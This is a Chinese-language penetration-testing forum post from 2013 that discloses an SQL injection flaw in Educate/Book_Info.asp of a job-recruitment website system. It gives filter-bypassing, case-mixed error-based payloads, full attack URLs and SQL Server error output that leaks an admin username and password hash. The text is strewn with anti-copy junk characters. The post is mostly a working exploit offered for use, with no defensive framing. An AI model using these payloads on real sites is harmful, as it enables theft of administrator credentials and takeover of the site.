中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
. N# }+ B& ^1 U$ Q3 ` + e2 ]# @0 H& F6 u$ X8 {
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
; K9 O8 m  i8 [: \, i: D+ x7 y, Z- \ * z9 u( R7 e- e  @
exp:如下7 ?# F$ v0 j9 y1 ]+ o# Q. B( E
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
  y) \: R) f5 p查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
6 ~% W# r% j* b
3 g* E8 [5 k0 _2 i  ?( ]6 I' @http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)2 l& X4 W' C& E

" ~8 G; C8 ?9 U9 I  p9 bMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'- A! ]/ A% o8 b5 |3 Q9 ?8 ]
3 Z" q/ C7 M- K& Z
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
$ r3 o' R- j5 L% f , r/ e' X& a7 ^' C# v
/Educate/Book_Info.asp,行 8- o9 I& h. X) ?
/ K3 m2 Z0 }. s& ?" Q: c; t; H
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
5 H1 W# T0 F' ~, M6 a 2 M) i% T" O1 V& f+ e$ H
Microsoft OLE DB Provider for SQL Server 错误 '80040e07': h/ D; Z: H8 y  x9 p
- D# i, r6 F/ i4 w! s
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。4 x7 d1 Z/ w4 z# m, m. g% ]
. T" g" B# N1 N) R/ g8 N+ s
/Educate/Book_Info.asp,行 8
* D' Z3 C4 l7 z* s




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2